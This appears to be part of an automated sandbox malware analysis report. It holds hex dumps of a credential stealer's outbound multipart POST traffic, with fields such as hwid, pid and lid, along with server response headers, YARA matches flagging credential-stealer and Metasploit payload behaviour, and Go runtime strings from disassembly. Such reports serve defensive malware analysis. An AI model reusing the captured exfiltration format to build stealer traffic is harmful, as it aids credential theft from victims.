                                                                              2025-01-07 12:19:45 UTC15331OUTData Raw: 2d 2d 47 56 57 4b 4a 42 37 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 43 30 44 33 36 35 46 35 38 41 37 42 33 32 32 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 47 56 57 4b 4a 42 37 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 47 56 57 4b 4a 42 37 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4a 77 71 75 6c 6e 2d 2d 33 31 31 32 59 54 0d 0a 2d 2d 47 56 57 4b 4a 42 37 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73
                                                                              Data Ascii: --GVWKJB737Content-Disposition: form-data; name="hwid"FC0D365F58A7B32220A4C476FD51BCB1--GVWKJB737Content-Disposition: form-data; name="pid"1--GVWKJB737Content-Disposition: form-data; name="lid"Jwquln--3112YT--GVWKJB737Content-Dis
                                                                              2025-01-07 12:19:45 UTC15331OUTData Raw: 7e 73 71 ac 9a 43 dd 8e 30 57 68 e6 91 9c d5 bc 6e 9e a1 2d c4 2d b8 1f 3a cc 01 0d f1 c9 79 da 8c 05 a6 be f7 ba 25 23 5d 09 21 8f 9f dc b5 e0 13 ee 39 e5 94 96 ba 66 0c 30 1d d9 bd 56 92 f5 d1 27 a1 b4 0a c4 fe fe b8 27 e1 47 4d 0e b6 35 78 7e 20 3a 44 b3 03 2c a2 b1 2a 8e ad 0e 62 99 54 2d 43 5d da ae 02 ea d5 df 09 b0 19 27 a0 8d 50 17 e0 db e2 40 0f 58 92 7d 23 b9 45 53 39 ab 3a 16 da b7 0e 01 61 ae 8f 5b 48 62 62 1e 35 0f 41 95 a1 6c de 3a 36 a9 b3 f2 a6 79 28 3e 89 3d 10 3c 9f 77 46 01 01 d8 1b 3b cd 18 81 c9 1e 1d 20 c2 18 ad 68 ad 66 6e 3f a0 4c 85 94 32 55 04 a1 22 09 f2 14 82 cf 8d 9a c0 01 01 cb 7b 3b 2e db d2 1c b6 45 d0 4f 6b 82 d9 cc db 68 30 6a f9 51 85 12 72 9a 06 a4 2f fd cf f6 e7 02 3a 80 48 20 30 4b 04 08 a0 7e 9d ee 39 03 f8 04 ea 4f
                                                                              Data Ascii: ~sqC0Whn--:y%#]!9f0V''GM5x~ :D,*bT-C]'P@X}#ES9:a[Hbb5Al:6y(>=<wF; hfn?L2U"{;.EOkh0jQr/:H 0K~9O
                                                                              2025-01-07 12:19:45 UTC15331OUTData Raw: f5 09 55 f3 dd 4c 76 4c 53 c2 9e fd 9c 32 25 f8 6f 14 cc fe 89 31 ad ec 65 b5 d7 d2 ea 7a 76 84 6b 1a a2 da ad ce bc 83 e8 a3 36 2a 01 21 e6 72 db 4b ef fe bb ef c3 ef bf 87 6f 80 be f3 40 53 e2 d7 fd ad bf 3f 51 bf 0c 72 3c 01 c4 c2 b2 17 8a d1 70 ca 74 b6 00 87 f8 59 25 8a 57 e6 bb 90 b7 0b 55 2d 26 ea c5 c0 71 d4 82 50 41 ef 97 ef 4e c3 41 11 94 e3 e8 48 9f 34 d2 5f 75 ba 52 bb 37 a8 cd ab 02 79 27 ba 7f 69 f0 f0 12 a1 e4 e5 84 af 08 be f4 c7 5f f7 ae 15 34 fb c3 9a bd 26 64 3b a6 bc 80 41 64 10 0a 46 85 90 d1 ef 14 cc 20 12 12 7b f2 df 17 a1 42 c8 a9 05 a2 51 b8 d6 5a c2 63 12 51 cf 28 94 7b bb 0f cb 27 cf d5 e6 62 cd 74 80 48 64 9c 11 3d 0d 41 6c 0c 2a de 4e 5a 43 1c 5b ea dd 86 07 c4 2e 26 37 47 e7 1b c1 8e ee 84 e1 b3 4e a4 36 a8 c5 a5 6c 0f 00 68
                                                                              Data Ascii: ULvLS2%o1ezvk6*!rKo@S?Qr<ptY%WU-&qPANAH4_uR7y'i_4&d;AdF {BQZcQ({'btHd=Al*NZC[.&7GN6lh
                                                                              2025-01-07 12:19:45 UTC15331OUTData Raw: ac 56 56 6a 82 5d 9d aa 0c dc c5 97 d3 84 b8 98 2d d3 61 84 e7 b3 ce 5d 23 8a d0 a8 f7 6a cb fc d6 3e 28 04 ea c3 a0 a1 a1 44 32 27 33 a7 92 bd 69 75 a8 57 69 6c 48 67 65 d7 03 09 34 a1 3e 78 09 51 6c 63 eb 0d ae 5e 07 95 3c fc 27 57 5e e6 3b 19 13 23 60 65 a9 13 cb ff b8 6c 56 ad 7e 94 72 6a de a3 f7 35 25 d8 9d af 56 27 ce 1b 7b 70 57 4a 19 42 63 8f 09 0b 43 c6 70 3f 9a 50 4c 5c 4d d2 4c 28 12 5e 82 fb b0 97 3f 25 b9 c5 6c 38 d9 a5 de 41 51 29 6c 68 ad cd 20 a9 61 a8 32 50 79 cf 87 cd eb 2f ac 20 c2 ec 4e bd 1f bc 88 b9 1a e9 01 c2 f2 ad c7 84 df b4 23 0d 12 1e 95 81 07 be f6 52 01 d5 9a af 63 b0 53 a9 67 e8 30 d3 e1 09 12 6f 02 0c 4b 59 2c fd 1c 68 09 6c fa bf 63 34 55 ec a7 86 64 96 54 2d 61 c6 4c 40 92 31 23 e2 94 30 d9 63 b3 8d a5 d6 51 28 a7 0d 65
                                                                              Data Ascii: VVj]-a]#j>(D2'3iuWilHge4>xQlc^<'W^;#`elV~rj5%V'{pWJBcCp?PL\ML(^?%l8AQ)lh a2Py/ N#RcSg0oKY,hlc4UdT-aL@1#0cQ(e
                                                                              2025-01-07 12:19:45 UTC15331OUTData Raw: b2 08 c4 53 f0 57 08 31 ec 9f e8 fa a6 82 58 c6 29 f8 ac 6c 10 2a 24 66 13 b1 e0 c8 a6 23 8c 8f 87 94 38 38 a6 47 44 96 88 24 a8 9f 47 fd a4 21 29 db 8f c1 ce 2b bf 0d b4 3c af 82 b8 22 1e 5e 00 f5 a7 f8 8a 15 cb 4f 2f 62 9e 9e bb 98 47 3c 7a e7 b0 71 8c 93 f0 07 be b2 5d 03 81 0f 52 6c bf 53 6e e7 de 3c 31 22 72 54 23 ff 81 9b 78 df 83 6b cf 1e de b5 56 ab bf 48 3b 55 80 0c 8e 29 8e 9d 28 58 94 9e 05 79 56 dc 84 37 14 49 42 22 cc 80 f6 27 90 67 83 dd ea cf 87 b1 dc c6 9c ba 6f ef 07 b7 97 ff 55 f8 bb 60 ce bc f2 21 fb 8a ff ed b3 7a eb 91 27 96 7e 8a 3e b7 9d cf 46 52 37 e9 21 5f ff 25 e0 27 ca 26 be c8 72 7b 3b 3a 8b 64 91 c1 c8 17 67 fa ee 24 4c 03 82 0b 30 86 83 71 1b 58 e0 7c a0 4a 4d a3 99 f1 e9 95 14 3c 9a eb 89 b7 80 1c dd 2f 90 cf f0 46 21 18 d6
                                                                              Data Ascii: SW1X)l*$f#88GD$G!)+<"^O/bG<zq]RlSn<1"rT#xkVH;U)(XyV7IB"'goU`!z'~>FR7!_%'&r{;:dg$L0qX|JM</F!
                                                                              2025-01-07 12:19:45 UTC15331OUTData Raw: a8 da db 11 31 da 6a e1 5e bb 19 24 6d 84 25 03 d3 6c 65 14 a3 69 50 b7 b6 e3 e8 9d 72 99 04 c4 94 25 a8 c7 aa c5 45 b1 2e 31 eb 2e c2 29 eb 12 61 a1 d2 52 17 58 26 63 75 ab d4 66 c6 ea 64 70 57 dd be dd 0d 9c ef 1f 21 97 45 a4 14 d4 2e 99 57 8a 40 e2 ff 36 92 c4 61 c6 80 4b 72 50 1b 94 a5 c1 c6 62 4b e8 dc 3f f9 37 6d 49 62 c5 53 40 c7 df bf bd 1b cc 49 a2 db b9 32 7b 31 b6 8a 98 7d cd 2b cf 6b f3 65 b3 90 d3 6b ec c8 46 7e 6b 18 48 50 8b eb 28 16 fa 48 9f 51 ca 76 f6 ca 8d 5d 7e 2f 1b 3e 6f 97 ba ce 8d 5b af 6c d7 a5 e2 67 8f ed c5 e2 8e 11 74 79 f7 d7 11 47 08 04 62 e6 c2 7c 5d 06 68 2e 5d 72 5f 57 ed 70 fe 6f b3 2c 8f d4 ba c0 4b 85 cc 77 be 75 6a 0a 16 3d 54 f7 b5 f3 04 eb d5 b1 8c 53 8b dc 5c 3f ef 06 1f e9 ee 55 70 eb 15 5d 13 68 2c 7c f7 29 45 4a
                                                                              Data Ascii: 1j^$m%leiPr%E.1.)aRX&cufdpW!E.W@6aKrPbK?7mIbS@I2{1}+kekF~kHP(HQv]~/>o[lgtyGb|]h.]r_Wpo,Kwuj=TS\?Up]h,|)EJ
                                                                              2025-01-07 12:19:45 UTC15331OUTData Raw: 62 fd 92 21 68 fa 8f 72 27 62 9d cb 52 b5 02 f7 2a 88 7a 6b bc d8 fc e3 b5 53 00 6b 59 f1 39 76 fd 82 f1 aa 0f 08 41 c4 6e 3d f0 44 f0 e9 4e fa e9 5b 25 6b 34 5a 2d a7 3d 37 1a f8 2f 34 2f ff ec 44 75 60 02 31 f1 a1 93 20 f0 1d 6d 34 49 90 99 33 a6 12 88 c6 73 7b bb 6f 89 99 9a b7 dc 1b 84 51 53 39 33 59 9c fd 9b ad d8 6d 95 cd 38 2c 07 bf d9 20 1a 91 1c c6 0d 1d 3d 5b c7 1c 5e ac 2a 77 92 88 20 4d 61 af d4 fb 70 20 ce d7 67 f5 6e 47 49 43 6e 6e fe d9 0e fc a0 35 ed 26 72 e7 19 a0 2b 7e 13 c9 79 cb 87 11 89 6b d1 27 ca fb a2 b2 7d 61 52 3c 61 fb 33 5a b0 dd 2c 4f ef 38 a0 c4 50 10 91 8a 7c 6f 0d 30 5d a2 4b a2 98 64 4b cc b3 32 95 5a c7 e0 dd 33 69 64 15 3f 14 9f 6b 76 10 4c 9c 87 82 82 fb d6 f1 ca 5d 1f 84 3a fb 1f 76 7f 93 7a e0 56 2c 71 bb 98 0e 9f 0b
                                                                              Data Ascii: b!hr'bR*zkSkY9vAn=DN[%k4Z-=7/4/Du`1 m4I3s{oQS93Ym8, =[^*w Map gnGICnn5&r+~yk'}aR<a3Z,O8P|o0]KdK2Z3id?kvL]:vzV,q
                                                                              2025-01-07 12:19:45 UTC15331OUTData Raw: 04 0b 33 aa 91 96 9f b2 35 74 41 28 b5 b3 d4 63 77 80 91 25 70 23 58 9f 24 7e a9 3b 6b 2e 27 0a 5e 1f 05 a9 b7 f8 55 c1 ee 62 65 30 f9 01 66 1c 80 2e 3f cf 0b 32 97 ac 70 f1 1f 32 27 b0 82 67 08 6d 55 dc f9 cb 5f a0 3c 80 df 03 23 b6 04 f1 83 01 44 41 36 26 d1 44 1f b9 df d8 7c 29 ce 68 56 fd 02 13 7b 75 0c 3b 18 33 03 43 4c 5b 01 34 be ed 38 49 10 28 fd 9d d2 f2 24 12 33 3d 96 ae d1 90 be 2d fd 8f e9 1f 77 29 8a 0d 43 11 ca 32 35 f2 44 9c d1 e3 fb ed 88 3e 43 68 09 f7 7d d9 de 99 59 aa 12 53 8c a7 f1 1f 5e ea 7c fb ac 35 06 62 a2 57 75 fb 44 e9 67 5d b9 be 9c ac 2a e8 08 2c fd d6 d6 2b 90 ad 0f 5f 8b 78 7b c4 86 19 7b 25 b9 76 d1 ff 71 ed 02 ba 8b c7 d7 04 40 c0 01 92 ed 1b 14 94 dd 12 5e 62 ed 10 51 b1 57 a6 fb 69 64 ff d9 3e dc df a3 c0 0c 73 e7 ed 89
                                                                              Data Ascii: 35tA(cw%p#X$~;k.'^Ube0f.?2p2'gmU_<#DA6&D|)hV{u;3CL[48I($3=-w)C25D>Ch}YS^|5bWuDg]*,+_x{{%vq@^bQWid>s
                                                                              2025-01-07 12:19:45 UTC15331OUTData Raw: 58 01 ae 59 28 33 21 90 9c 44 9e 3b d0 29 fb 63 37 71 0e 99 f1 71 a4 6e fc 42 f6 94 ef a7 f8 dd 04 2d 36 4c 15 bb fc 27 de c2 32 50 fc 60 8a 86 3f 1b 4c 6f ac 56 6d ab 35 96 09 bb f4 35 de 90 27 25 71 e5 b7 a3 1a 45 08 c8 3c ad 2d 45 a7 d0 8f 15 40 eb 72 63 17 ac 7a 5b 84 3b 3d 57 aa 5c 71 06 1a b1 ca 31 c1 54 d4 eb d0 e4 4d 93 87 ef 47 69 80 7a 57 14 d9 c8 5e f7 60 b4 ff 5a ce 12 0f 3f ef ad 64 a0 bf 94 7c dc 6d e0 13 7b 5f 22 9a 6a f9 37 7f fd 87 6c 20 83 ac 15 87 c8 07 3b b8 9f dc c1 af 71 31 70 36 0f 65 d3 6d 51 87 a5 46 63 63 d4 45 c1 3e 29 12 22 4e 76 bf 55 28 bc 4b a4 da e3 e0 ba 7b b1 b4 6e d1 2f d7 88 3b 1a e2 a2 8d a8 2f f2 8e b8 0d be 91 4f 10 2d 10 45 9e a0 6e 4a 4a 5b 56 9d 5a af c9 fc 20 40 bf aa 2a 9d 17 f0 a4 68 4a 94 86 5d 10 40 bf fa ba
                                                                              Data Ascii: XY(3!D;)c7qqnB-6L'2P`?LoVm55'%qE<-E@rcz[;=W\q1TMGizW^`Z?d|m{_"j7l ;q1p6emQFccE>)"NvU(K{n/;/O-EnJJ[VZ @*hJ]@
                                                                              2025-01-07 12:19:45 UTC15331OUTData Raw: 75 7a b2 31 8e b2 47 fc e7 2a e3 a5 c3 48 4c 47 72 3e 39 81 a5 85 7f de 59 9a 83 55 16 42 41 53 25 ad c5 6b d7 ee 88 56 cb 80 fe a0 05 64 68 8f 82 0f 49 66 3e fc ae d0 98 1b 98 10 38 92 cb d6 4e 9c af fd 98 a1 96 fb ee d7 9a eb 4d f6 cb 71 de 0b 2b 62 ef 85 db 86 cd 6f cc 5a 70 e7 39 b2 0b 94 8c a5 1c 31 73 61 b1 95 8c 44 20 b9 21 ce 18 49 27 13 58 e2 2b 58 0d 4d 2f 81 6e 79 f8 f8 6e 74 4a 21 61 c1 ad 85 33 2a 42 9e 26 3e 8f c3 02 db aa df 3b 26 92 78 b4 0c a3 6e 4b ba 24 2f 4b 04 15 a1 42 64 72 5b c2 ff 54 7b be 20 c9 de 92 4c d1 83 0a 78 b6 f2 98 8a 1a cb 5a 55 5e 2c 7b f4 b7 fa 40 eb 6a 48 2f 97 5a 2e 3d e7 66 f6 b1 96 3b 99 a5 27 b7 66 4f 40 d3 ca ee c4 c3 3f 75 82 92 5b ab 34 74 d8 6b 31 a1 a3 f9 26 83 65 46 fc be d2 50 63 50 31 3f da a2 c5 04 d4 91
                                                                              Data Ascii: uz1G*HLGr>9YUBAS%kVdhIf>8NMq+boZp91saD !I'X+XM/nyntJ!a3*B&>;&xnK$/KBdr[T{ LxZU^,{@jH/Z.=f;'fO@?u[4tk1&eFPcP1?
                                                                              2025-01-07 12:19:46 UTC1127INHTTP/1.1 200 OK
                                                                              Date: Tue, 07 Jan 2025 12:19:46 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=e6crsrgbt33fo07clakaefvas1; expires=Sat, 03 May 2025 06:06:25 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              X-Frame-Options: DENY
                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 1; mode=block
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J8WOo0nVyRQKY7DwX04aRsKbgGB8nuAZUgVeVGu3ipeWybgxhmKA9SAYQGxHdYQsnr5Rn3WpquG21uDLCOH%2FoNa1D7aq7qxmGO%2B7EgttITxPeQrFzG829TBWCVhLHDknUBLm"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8fe3e5e07b2043a4-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2402&min_rtt=2380&rtt_var=937&sent=194&recv=578&lost=0&retrans=0&sent_bytes=2841&recv_bytes=564736&delivery_rate=1141070&cwnd=232&unsent_bytes=0&cid=3b43c29ac8d8a881&ts=1655&x=0"


                                                                              Statistics

                                                                              CPU Usage

                                                                              Click to jump to process

                                                                              Memory Usage

                                                                              Click to jump to process

                                                                              High Level Behavior Distribution

                                                                              Click to dive into process behavior distribution

                                                                              Behavior

                                                                              Click to jump to process

                                                                              System Behavior

                                                                              General

                                                                              Target ID:0
                                                                              Start time:07:19:05
                                                                              Start date:07/01/2025
                                                                              Path:C:\Users\user\Desktop\64pOGv7k4N.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\64pOGv7k4N.exe"
                                                                              Imagebase:0xab0000
                                                                              File size:3'805'184 bytes
                                                                              MD5 hash:A56FC11692AB8BAF7F9E3B80540D63C5
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.1648435573.0000000011780000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:3
                                                                              Start time:07:19:31
                                                                              Start date:07/01/2025
                                                                              Path:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                              Imagebase:0x8e0000
                                                                              File size:231'736 bytes
                                                                              MD5 hash:A64BEAB5D4516BECA4C40B25DC0C1CD8
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.1725784713.0000000003326000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              Disassembly

                                                                              Reset < >

                                                                                Non-executed Functions

                                                                                Function 00AD6F70 Relevance: 16.9, Strings: 13, Instructions: 653COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • ), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADT, xrefs: 00AD7305
                                                                                • runtime: p.searchAddr = span has no free objectsstack trace unavailablestructure needs cleaningx509: malformed validityzlib: invalid dictionary{%06X-%04X-%04X-%04X-%X} bytes failed with errno= to unused region of span!#$%&'()-@^_`{}~+,.;=[]\/2006-01-02T15:04:, xrefs: 00AD77E4
                                                                                • bad summary databad symbol tablecastogscanstatuscontext canceleddivision by zerogc: unswept spangcshrinkstackoffgetprotobynumberinteger overflowinvalid argumentinvalid encodinginvalid exchangeinvalid g statuslength too largemSpanList.insertmSpanList.removemess, xrefs: 00AD735C, 00AD7AEE
                                                                                • , i = , not .reloc390625<-chanAnswerArabicAugustBrahmiCarianChakmaCommonCopticENCLogENCMapExpectExportFlags=FormatFridayGOROOTGetACPGothicHangulHatranHebrewHyphenIgnoreImportKaithiKhojkiLepchaLycianLydianMIPS16ModuleMondayNativeRejangSCHED STREETStringSundaySy, xrefs: 00AD7811
                                                                                • , ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADTAS, xrefs: 00AD72B1, 00AD72DB, 00AD76DA, 00AD7704
                                                                                • , j0 = 19531252.5.4.32.5.4.52.5.4.62.5.4.72.5.4.82.5.4.99765625AvestanBengaliBorlandBrailleChanDirCopySidCypriotDeseretEd25519ElbasanElymaicFreeSidGODEBUGGranthaHanunooIO waitImplMapJanuaryKannadaMD2-RSAMD5-RSAMUI_DltMUI_StdMakasarMandaicMarchenMultaniMyanmarN, xrefs: 00AD7799
                                                                                • , levelBits[level] = 186264514923095703125931322574615478515625AdjustTokenPrivilegesAlaskan Standard TimeAnatolian_HieroglyphsArabian Standard TimeBelarus Standard TimeCM_Get_DevNode_StatusCentral Standard TimeChangeServiceConfig2WDeregisterEventSourceEastern , xrefs: 00AD7899
                                                                                • ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADTASTAprAugBSTCATCDTCETCLRCSTDSADecDltE (EATEDTEETEOFESTFPOFebFriGMTHDTHSTHanIATIDTISTJSTJanJulJunKSTLaoMD4MD5, xrefs: 00AD725C, 00AD7685
                                                                                • runtime: npages = runtime: range = {runtime: textAddr segmentation faultsequence truncatedstreams pipe errorsystem page size (tracebackancestorstruncated sequenceuse of closed filevalue out of range [controller reset] called using nil *, g->atomicstatus=, gp-, xrefs: 00AD7325
                                                                                • , npages = -syncWithWU/dev/stderr/dev/stdout30517578125: frame.sp=AssemblyRefBLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256BoundImportClassHESIODClassLayoutCloseHandleCoGetObjectCreateFileWDelayImportDeleteFileWDives_AkuruExitProcessFieldLayoutFreeLibraryGOTRACE, xrefs: 00AD776C
                                                                                • runtime: level = runtime: nameOff runtime: pointer runtime: summary[runtime: textOff runtime: typeOff scanobject n == 0select (no cases)stack: frame={sp:swept cached spanthread exhaustionunknown caller pcunknown type kindwait for GC cyclewine_get_version, xrefs: 00AD773D
                                                                                • runtime: levelShift[level] = runtime: marking free object runtime: p.gcMarkWorkerMode= runtime: split stack overflowruntime: sudog with non-nil cruntime: summary max pages = semacquire not on the G stackstring concatenation too longsyntax error scanning boolea, xrefs: 00AD786C
                                                                                • ] = ] n=allgallpasn1avx2basebindbmi1bmi2boolcallcas1cas2cas3cas4cas5cas6chandeadermsfileftpsfunchourhttpicmpidleigmpint8itabkindopenpathpipepop3profquitreadrecvrootsbrkseeksendsmtpsse3tag:tcp4trueudp4uint -%s ... BOM) MB, and max= ms, ptr tab= top=+0330+, xrefs: 00AD76B0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADT$, ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADTAS$, i = , not .reloc390625<-chanAnswerArabicAugustBrahmiCarianChakmaCommonCopticENCLogENCMapExpectExportFlags=FormatFridayGOROOTGetACPGothicHangulHatranHebrewHyphenIgnoreImportKaithiKhojkiLepchaLycianLydianMIPS16ModuleMondayNativeRejangSCHED STREETStringSundaySy$, j0 = 19531252.5.4.32.5.4.52.5.4.62.5.4.72.5.4.82.5.4.99765625AvestanBengaliBorlandBrailleChanDirCopySidCypriotDeseretEd25519ElbasanElymaicFreeSidGODEBUGGranthaHanunooIO waitImplMapJanuaryKannadaMD2-RSAMD5-RSAMUI_DltMUI_StdMakasarMandaicMarchenMultaniMyanmarN$, levelBits[level] = 186264514923095703125931322574615478515625AdjustTokenPrivilegesAlaskan Standard TimeAnatolian_HieroglyphsArabian Standard TimeBelarus Standard TimeCM_Get_DevNode_StatusCentral Standard TimeChangeServiceConfig2WDeregisterEventSourceEastern $, npages = -syncWithWU/dev/stderr/dev/stdout30517578125: frame.sp=AssemblyRefBLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256BoundImportClassHESIODClassLayoutCloseHandleCoGetObjectCreateFileWDelayImportDeleteFileWDives_AkuruExitProcessFieldLayoutFreeLibraryGOTRACE$] = ] n=allgallpasn1avx2basebindbmi1bmi2boolcallcas1cas2cas3cas4cas5cas6chandeadermsfileftpsfunchourhttpicmpidleigmpint8itabkindopenpathpipepop3profquitreadrecvrootsbrkseeksendsmtpsse3tag:tcp4trueudp4uint -%s ... BOM) MB, and max= ms, ptr tab= top=+0330+$][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADTASTAprAugBSTCATCDTCETCLRCSTDSADecDltE (EATEDTEETEOFESTFPOFebFriGMTHDTHSTHanIATIDTISTJSTJanJulJunKSTLaoMD4MD5$bad summary databad symbol tablecastogscanstatuscontext canceleddivision by zerogc: unswept spangcshrinkstackoffgetprotobynumberinteger overflowinvalid argumentinvalid encodinginvalid exchangeinvalid g statuslength too largemSpanList.insertmSpanList.removemess$runtime: level = runtime: nameOff runtime: pointer runtime: summary[runtime: textOff runtime: typeOff scanobject n == 0select (no cases)stack: frame={sp:swept cached spanthread exhaustionunknown caller pcunknown type kindwait for GC cyclewine_get_version$runtime: levelShift[level] = runtime: marking free object runtime: p.gcMarkWorkerMode= runtime: split stack overflowruntime: sudog with non-nil cruntime: summary max pages = semacquire not on the G stackstring concatenation too longsyntax error scanning boolea$runtime: npages = runtime: range = {runtime: textAddr segmentation faultsequence truncatedstreams pipe errorsystem page size (tracebackancestorstruncated sequenceuse of closed filevalue out of range [controller reset] called using nil *, g->atomicstatus=, gp-$runtime: p.searchAddr = span has no free objectsstack trace unavailablestructure needs cleaningx509: malformed validityzlib: invalid dictionary{%06X-%04X-%04X-%04X-%X} bytes failed with errno= to unused region of span!#$%&'()-@^_`{}~+,.;=[]\/2006-01-02T15:04:
                                                                                • API String ID: 0-994956587
                                                                                • Opcode ID: b4174de4a65283a9636c29ac80391ae45c289f3c892c5d3be3b4accbce32fa1d
                                                                                • Instruction ID: de0bb72da727dd9076a62d9c66143c5d6fb4649c4b516d2d4af8f9992150aa5f
